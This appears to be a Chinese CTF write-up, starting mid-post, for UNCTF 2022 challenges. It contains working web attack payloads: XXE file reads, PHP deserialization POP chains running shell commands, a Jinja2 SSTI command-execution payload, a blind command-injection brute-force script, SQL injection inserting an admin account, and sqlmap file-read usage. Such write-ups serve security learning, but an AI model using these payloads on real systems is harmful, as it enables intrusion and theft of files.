<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">root</span>[</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="keyword">flag</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///flag&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">username</span>&gt;</span><span class="symbol">&amp;flag;</span><span class="tag">&lt;/<span class="name">username</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">password</span>&gt;</span>2333<span class="tag">&lt;/<span class="name">password</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src= "/img/143da1796e334dbd95a07e96082c52fd-1689254304521-223.png" alt="在这里插入图片描述"></p>
<h3 id="快乐三消-河南理工大学"><a href="#快乐三消-河南理工大学" class="headerlink" title="快乐三消-河南理工大学"></a>快乐三消-河南理工大学</h3><p>做 ctfshow 的黑盒题做多了这种题就好说了<br>先扫目录扫到 admin 和.git<br>githack 直接 down 下来<br>发现没多少东西<br>转去看 admin<br>也没注释啥的<br>开始猜密码<br>没猜到<br>放了一段时间回来看想到 admin 目录下还可能有备份泄露<br>之前光跑的主目录下的<br>跑 admin 下发现个 login.php.bak<br>有注释 admin&#x2F;unctf<br>进入后台<br><img src= "/img/7dc621151ff14881b0cb946299cc1d6a-1689254306895-226.png" alt="在这里插入图片描述"></p>
<p>本来又想 upload 的时候<br>直觉告诉我应该不是<br>转去看源码<br>发现 fi.php?filename&#x3D;index.php</p>
<blockquote>
<p>到这里后发现刚才扫目录的时候也扫到 fi 了<br>但是当时不知到咋用<br>fi 应该是 file 吧<br>学会了，下会遇见就接<code>?filename=</code></p>
</blockquote>
<p>定位到那个按钮发现是个网站套网站，应该能读 flag<br><code>/admin/fi.php?filename=/flag</code><br>读到<br>题本身不难<br>但是误导性太强了<br>出题师傅 tql</p>
<h3 id="ezunseri-西华大学"><a href="#ezunseri-西华大学" class="headerlink" title="ezunseri-西华大学"></a>ezunseri-西华大学</h3><p>destruct-&gt;get-&gt;toString-&gt;invoke-&gt;绕过 wakeup</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Exec</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$content</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">execute</span>(<span class="params"><span class="variable">$var</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable language_">$this</span>-&gt;content);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;content;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$content</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">execute</span>(<span class="variable">$this</span>-&gt;content);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;content = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;1!5!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$test</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$key</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">$this</span>-&gt;test = <span class="keyword">new</span> <span class="title class_">Exec</span>();</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;test-&gt;content = <span class="string">&quot;system(&#x27;cat /fl*&#x27;);&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$name</span> = <span class="variable language_">$this</span>-&gt;test;</span><br><span class="line">        <span class="variable">$name</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Login</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$code</span> = <span class="string">&#x27;3.1415926&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$key</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;code = <span class="string">&#x27;3.1415926&#x27;</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;key-&gt;name;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">Login</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;key = <span class="keyword">new</span> <span class="title class_">Exec</span>();</span><br><span class="line"><span class="variable">$a</span>-&gt;key-&gt;content = <span class="keyword">new</span> <span class="title class_">Test</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>),<span class="string">&quot;\n&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>得到<br><code>O:5:&quot;Login&quot;:3:&#123;s:4:&quot;name&quot;;N;s:4:&quot;code&quot;;s:9:&quot;3.1415926&quot;;s:3:&quot;key&quot;;O:4:&quot;Exec&quot;:1:&#123;s:7:&quot;content&quot;;O:4:&quot;Test&quot;:2:&#123;s:4:&quot;test&quot;;O:4:&quot;Exec&quot;:1:&#123;s:7:&quot;content&quot;;s:19:&quot;system(&#39;cat /fl*&#39;);&quot;;&#125;s:3:&quot;key&quot;;N;&#125;&#125;&#125;</code><br>将 Exec 的成员数改为 2（两个任意一个即可）<br>绕过 wakeup<br><code>O:5:&quot;Login&quot;:3:&#123;s:4:&quot;name&quot;;N;s:4:&quot;code&quot;;s:9:&quot;3.1415926&quot;;s:3:&quot;key&quot;;O:4:&quot;Exec&quot;:1:&#123;s:7:&quot;content&quot;;O:4:&quot;Test&quot;:2:&#123;s:4:&quot;test&quot;;O:4:&quot;Exec&quot;:2:&#123;s:7:&quot;content&quot;;s:19:&quot;system(&#39;cat /fl*&#39;);&quot;;&#125;s:3:&quot;key&quot;;N;&#125;&#125;&#125;</code></p>
<h3 id="poppop-中国人民公安大学"><a href="#poppop-中国人民公安大学" class="headerlink" title="poppop-中国人民公安大学"></a>poppop-中国人民公安大学</h3><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$code</span> = <span class="string">&quot;phpinfo();&quot;</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$method</span>, <span class="variable">$args</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable language_">$this</span>-&gt;code);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;code = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">B</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$key</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;key;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">C</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$key2</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;key2 = <span class="keyword">new</span> <span class="title function_ invoke__">A</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;key2-&gt;<span class="title function_ invoke__">abab</span>(<span class="number">1</span>,<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">new</span> <span class="title function_ invoke__">B</span>();</span><br><span class="line"><span class="variable">$b</span>-&gt;key = <span class="keyword">new</span> <span class="title function_ invoke__">C</span>();</span><br><span class="line"><span class="comment">//$b-&gt;key-&gt;key2 = new A();</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$b</span>)), <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$b</span>), <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="babynode-云南大学"><a href="#babynode-云南大学" class="headerlink" title="babynode-云南大学"></a>babynode-云南大学</h3><p>看题目描述<br>原型链污染<br>直接套</p>
<blockquote>
<p>ps：感觉见过类似的题好像是 ctfshow？</p>
</blockquote>
<p>json 格式传</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line">&#123;<span class="string">&quot;__proto__&quot;</span>:&#123;<span class="string">&quot;id&quot;</span>:<span class="string">&quot;unctf&quot;</span>&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src= "/img/36c51123eb204808b36a03f5bc284255-1689254311795-229.png" alt="在这里插入图片描述"></p>
<h3 id="easy-ssti-金陵科技学院"><a href="#easy-ssti-金陵科技学院" class="headerlink" title="easy ssti-金陵科技学院"></a>easy ssti-金陵科技学院</h3><p>jinjia2<br>ssti 常用 payload 随便上一个<br>过滤 class<br>各种操作掩护一下 class<br>都不行<br>class 查的很严啊<br>别骂了别骂了<br><img src= "/img/eb71256a4e5a4552ac2cf3cb8db1b470-1689254313611-232.png" alt="在这里插入图片描述"></p>
<p>换方法:<br><code>&#123;&#123;x.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()")&#125;&#125;</code><br>成功输出<br>改下 payload 读 flag.txt<br><del>NM</del><br><img src= "/img/ff64b104d05f4653931010c509c859ed-1689254316387-235.png" alt="在这里插入图片描述"><br>给你点祝福了你还骗我<br>nnd<br>想到这个比赛藏 flag 基本都在 env 里<br><del>有无代打出题人服务</del><br>读 env<br>成功<br><img src= "/img/71a2f0f0d5834ec59d7d1e147c1edaa8-1689254317912-238.png" alt="在这里插入图片描述"></p>
<h3 id="easy-rce-西南科技大学"><a href="#easy-rce-西南科技大学" class="headerlink" title="easy_rce-西南科技大学"></a>easy_rce-西南科技大学</h3><p>提示 rce 的布尔盲注<br>发现<code>&gt;&lt;</code>被过滤 不乐<br>写脚本直接爆</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">charlist = <span class="string">&#x27;abcdefghijklmnopqrstuvwxyz01234567890_-&#x27;</span></span><br><span class="line">result = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>, <span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> charlist:</span><br><span class="line">        url = <span class="string">&quot;http://4a423fce-e3cf-4d13-9f02-f28cb11fa8ba.node.yuzhian.com.cn/index.php?code=test $(echo $(tac /?lag)|cut -c &#123;0&#125;) == &#123;1&#125;||1&quot;</span>.<span class="built_in">format</span>(</span><br><span class="line">            i, char)</span><br><span class="line">        <span class="comment"># print(url)</span></span><br><span class="line">        back = requests.get(url=url)</span><br><span class="line">        <span class="comment"># print(back.text)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;success&quot;</span> <span class="keyword">in</span> back.text:</span><br><span class="line">            result = result + char</span><br><span class="line">            <span class="built_in">print</span>(i, back.text)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;fail&quot;</span> <span class="keyword">in</span> back.text:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;UNCTF&#123;&#x27;</span> + result + <span class="string">&#x27;&#125;&#x27;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="EZ-2048"><a href="#EZ-2048" class="headerlink" title="EZ-2048"></a>EZ-2048</h3><p>按下 f12<br>发现程序监听等候在 game.js<br>然后想到输入邀请码错误后返回 error<br>在 game.js 搜索 error<br><img src= "/img/545bbca2475a42b3b72959d1464860cf-1689254326354-247.png" alt="在这里插入图片描述"><br>然后一直往上查到 checkInvited()<br>仔细阅读后发现<br>加密方式在这里<br>分奇偶数进行两种异或<br><img src= "/img/f6db654f9fd24e0a8f9d7177218d09cd-1689254324923-244.png" alt="在这里插入图片描述"><br>由于环境中 f12 自动卡在 debuger<br>所以只能 down 到本地运行<br><img src= "/img/7cf6aebbd3aa48cfbd58f89380aae553-1689254321982-241.png" alt="在这里插入图片描述"><br>本地起了个环境<br>删掉 game.js 的第一行<br>使得可以本地调试<br>由于需要得到这几组数据<br><img src= "/img/868021b559614f9bb45683b3b8f839bb-1689254335939-250.png" alt="在这里插入图片描述"><br>需要转成正常 10 进制<br>尝试打个断点<br>看下数据<br>可以在 debug 中<br><img src= "/img/77a856ed81444f239edbbd7e8ca93092-1689254337582-253.png" alt="在这里插入图片描述"><br>点击 buf 后面的跳转到内存检查器<br>16 转 10 后得到正常数据<br><img src= "/img/1ba2094dffba4102996b6b4886d139f8-1689254339471-256.png" alt="在这里插入图片描述"><br>写脚本逆回去<br>由于偶数列与 invite 的 i+1 相关即 invite 的奇数项<br>所以需要先将 invite 的奇数项全部生成<br>先把奇数项逆回去</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">view = [</span><br><span class="line">    <span class="number">68</span>, <span class="number">51</span>, <span class="number">15</span>, <span class="number">80</span>, <span class="number">93</span>, <span class="number">14</span>, <span class="number">58</span>, <span class="number">50</span>, <span class="number">88</span>, <span class="number">48</span>, <span class="number">42</span>, <span class="number">26</span>, <span class="number">13</span>, <span class="number">22</span>, <span class="number">18</span>, <span class="number">5</span>, <span class="number">2</span>, <span class="number">86</span>, <span class="number">0</span>, <span class="number">2</span>,</span><br><span class="line">    <span class="number">0</span>, <span class="number">19</span>, <span class="number">0</span>, <span class="number">0</span></span><br><span class="line">]</span><br><span class="line">inv = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">24</span>, <span class="number">2</span>):  <span class="comment"># 先逆奇数项</span></span><br><span class="line">    other = view[i - <span class="number">2</span>] <span class="keyword">if</span> i - <span class="number">2</span> &gt;= <span class="number">0</span> <span class="keyword">else</span> <span class="number">0</span></span><br><span class="line">    view[i] ^= other</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">24</span>, <span class="number">2</span>):  <span class="comment"># 再逆偶数项</span></span><br><span class="line">    other = view[i + <span class="number">1</span>] <span class="keyword">if</span> i + <span class="number">1</span> &lt;= <span class="number">23</span> <span class="keyword">else</span> <span class="number">0</span></span><br><span class="line">    view[i] ^= other</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">24</span>):</span><br><span class="line">    inv += <span class="built_in">chr</span>(view[i])</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(inv)</span><br><span class="line"><span class="comment">## w3lc0me_7o_unctf2022!!!!</span></span><br></pre></td></tr></table></figure>

<p>然后将本地的 game.js 中 addRandomTile（）<br>生成的随机方块改为固定的<br>即将 223 行改为<br><code>const value = 1024;</code><br>通关条件检测的是 1024 碰撞生成 2018 的过程<br>此处若改为 2048<br>则无该过程<br>所以最快只能改为 1024</p>
<blockquote>
<p>我感觉该题貌似也可以通过逆向 wasm 来直接获取 flag<br>不过那估计就不是 web 题了 乐<br>本来这题就是个密码学题 不乐</p>
</blockquote>
<p><img src= "/img/33495e06082f49a2ad47f3007402d69b-1689254341777-259.png" alt="在这里插入图片描述"></p>
<h3 id="随便注-云南警官学院"><a href="#随便注-云南警官学院" class="headerlink" title="随便注-云南警官学院"></a>随便注-云南警官学院</h3><p>过滤了 or and select use（是 use 不是 user？怪哦）双写可绕过<br>尝试了几下没啥手感<br>转去偷懒用 sqlmap<br>先是读库，表，行都正常<br>记得有个 haha 表 笑话我是吧<br>然后还有个 ctftranning -&gt; FLAG_TABLE -&gt; FLAG_COLUMN 读的时候没回显貌似是空的<br>但是读 ctftranning 里的 news 里面说就在这个库里，但不在这<br>人傻了<br>在那个库里疯狂找<br>甚至怀疑 FLAG_COLUMN 里的读不到是有过滤导致的<br>还在那想咋绕过啥的<br>最后死活出不来<br>于是去尝试 sql 注入的文件操作<br>sqlmap <code>--os-shell</code>没成功？<br>但是<code>--file-read &quot;/flag&quot;</code>成功带回</p>
<h3 id="Sqlsql-中国人民公安大学"><a href="#Sqlsql-中国人民公安大学" class="headerlink" title="Sqlsql-中国人民公安大学"></a>Sqlsql-中国人民公安大学</h3><p>审源码发现<br>多处都有 addslashes_deep 过滤<br>有想到时 addslash 旧版本有绕过<br>跟进之后发现该函数过滤挺严格的<br>于是放弃该方法<br>转向逻辑性漏洞<br>最后发现 index.php 里<br><img src= "https://img-blog.csdnimg.cn/636d3201710f4936b161de363b53c5c4.png" alt="在这里插入图片描述"><br>qxxx 都没有经过 addslashes_deep 过滤直接 insert 进去了<br>尝试从这里注进去<br>由于本体的重点应该是使用 admin 用户去查询<br>所以考虑能 insert 一个 admin 用户的方法<br>不需要查数据所以也就不需要回显<br><code>&#39;);insert into users values (NULL,&#39;admin&#39;,&#39;2105044235&#39;);#</code><br>在 index.php 的做题界面随便选<br>burp 截包将上面 payload 加在 post 的答案后面重发<br>然后登出<br>用 admin 登录<br><img src= "/img/85e3f5fd661f44cf81edda69c26126ce-1689254344389-262.png" alt="在这里插入图片描述"></p>
<p>查询成绩<br><img src= "/img/e2aaf17890c44f2587b36ea065e110e8-1689254345707-265.png" alt="在这里插入图片描述"></p>
<p>这里查询任何一位存在的用户都可以 get flag</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="welcomeUNCTF2022-云南警官学院"><a href="#welcomeUNCTF2022-云南警官学院" class="headerlink" title="welcomeUNCTF2022-云南警官学院"></a>welcomeUNCTF2022-云南警官学院</h3><p><img src= "/img/e553ec18f9c84deeb0dc32119ac15c33-1689254347996-268.png" alt="在这里插入图片描述"></p>
<p><img src= "/img/8872068fbc6d4af586f11283c1a8cfcf-1689254349823-271.png" alt="在这里插入图片描述"></p>
<h3 id="石头剪刀布-西华大学"><a href="#石头剪刀布-西华大学" class="headerlink" title="石头剪刀布-西华大学"></a>石头剪刀布-西华大学</h3><p>伪随机数<br>伪代码中 seed&#x3D;0xA<br>然后 pwn</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">elf = cdll.LoadLibrary(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;info&#x27;</span></span><br><span class="line"></span><br><span class="line">elf.srand(<span class="number">0xA</span>)</span><br><span class="line">k = <span class="number">0</span></span><br><span class="line"><span class="built_in">list</span> = []</span><br><span class="line"></span><br><span class="line">conn = remote(<span class="string">&#x27;node.yuzhian.com.cn&#x27;</span>, <span class="number">31599</span>)</span><br><span class="line"></span><br><span class="line">conn.recv()</span><br><span class="line">conn.send(<span class="string">&#x27;y&#x27;</span>)</span><br><span class="line">conn.recv()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;pwn!&quot;</span>)</span><br><span class="line">conn.recv()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    num = elf.rand() % <span class="number">3</span></span><br><span class="line">    <span class="keyword">if</span> num == <span class="number">0</span>:</span><br><span class="line">        payload = <span class="number">2</span></span><br><span class="line">    <span class="keyword">elif</span> num == <span class="number">1</span>:</span><br><span class="line">        payload = <span class="number">0</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        payload = <span class="number">1</span></span><br><span class="line">    <span class="built_in">print</span>(i, <span class="string">&#x27;:&#x27;</span>, payload)</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">str</span>(payload))</span><br><span class="line">    conn.sendline(<span class="built_in">str</span>(payload))</span><br><span class="line">    tf = conn.recvrepeat(timeout=<span class="number">0.1</span>)</span><br><span class="line">    <span class="comment"># if &quot;success!!!&quot; in str(tf):</span></span><br><span class="line">    <span class="comment">#     print(&quot;###################&quot;)</span></span><br><span class="line"></span><br><span class="line">conn.close()</span><br><span class="line">flag = conn.recvall()</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;&#x27;</span>.join(<span class="built_in">list</span>), tf, flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src= "/img/5acef8e448c64377994a0838d9df83b0-1689254352850-274.png" alt="在这里插入图片描述"></p>
<h2 id="re"><a href="#re" class="headerlink" title="re"></a>re</h2><h3 id="whereisyourkey-广东海洋大学"><a href="#whereisyourkey-广东海洋大学" class="headerlink" title="whereisyourkey-广东海洋大学"></a>whereisyourkey-广东海洋大学</h3><p>先看 main<br>建了个数组<br>经过 ooooo 处理<br>即为 flag<br><img src= "/img/662707f47f814216a47389709123f9b4-1689254354631-277.png" alt="在这里插入图片描述"></p>
<p><img src= "/img/f8aa18f899f34a8e8a3f987404631d35-1689254356279-280.png" alt="在这里插入图片描述"></p>
<figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">ooooo</span><span class="params">(<span class="type">int</span> a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (a1 == <span class="number">109</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">109</span>;</span><br><span class="line">    <span class="keyword">if</span> (a1 &lt;= <span class="number">111</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (a1 &lt;= <span class="number">110</span>)</span><br><span class="line">            a1 -= <span class="number">2</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        a1 += <span class="number">3</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> a1;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> v5[<span class="number">10</span>], i;</span><br><span class="line">    v5[<span class="number">0</span>] = <span class="number">118</span>;</span><br><span class="line">    v5[<span class="number">1</span>] = <span class="number">103</span>;</span><br><span class="line">    v5[<span class="number">2</span>] = <span class="number">112</span>;</span><br><span class="line">    v5[<span class="number">3</span>] = <span class="number">107</span>;</span><br><span class="line">    v5[<span class="number">4</span>] = <span class="number">99</span>;</span><br><span class="line">    v5[<span class="number">5</span>] = <span class="number">109</span>; <span class="comment">// //109</span></span><br><span class="line">    v5[<span class="number">6</span>] = <span class="number">104</span>;</span><br><span class="line">    v5[<span class="number">7</span>] = <span class="number">110</span>;</span><br><span class="line">    v5[<span class="number">8</span>] = <span class="number">99</span>;</span><br><span class="line">    v5[<span class="number">9</span>] = <span class="number">105</span>;</span><br><span class="line"></span><br><span class="line">    cout&lt;&lt;<span class="string">&quot;UNCTF&#123;&quot;</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt;= <span class="number">9</span>; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        v5[i] = <span class="built_in">ooooo</span>(v5[i]);</span><br><span class="line">        cout &lt;&lt; (<span class="type">char</span>)v5[i];</span><br><span class="line">    &#125;</span><br><span class="line">    cout&lt;&lt;<span class="string">&quot;&#125;&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="ezzzzre-广东海洋大学"><a href="#ezzzzre-广东海洋大学" class="headerlink" title="ezzzzre-广东海洋大学"></a>ezzzzre-广东海洋大学</h3><p><img src= "/img/0f5939a7be0f4b2d9b055c10187b1696-1689254358546-283.png" alt="在这里插入图片描述"><br>直接根据他的处理 flag &#x3D; 2 * aHelloctf[i] - 69;<br><img src= "/img/99e2c915020340ef922e7edd5e812b9e-1689254360548-286.png" alt="在这里插入图片描述"></p>
<figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    string aHelloctf = <span class="string">&quot;HELLOCTF&quot;</span>;</span><br><span class="line">    string flag;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt;= <span class="number">7</span>; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        flag = <span class="number">2</span> * aHelloctf[i] - <span class="number">69</span>;</span><br><span class="line">        cout &lt;&lt; flag;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//cout &lt;&lt; flag &lt;&lt; endl;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h2><h3 id="dddd-西南科技大学"><a href="#dddd-西南科技大学" class="headerlink" title="dddd-西南科技大学"></a>dddd-西南科技大学</h3><p>就 0 和 1 转成<code>.-</code><br>&#x2F;转成空格<br>莫斯解<br>赛博厨子构造一手一把梭</p>
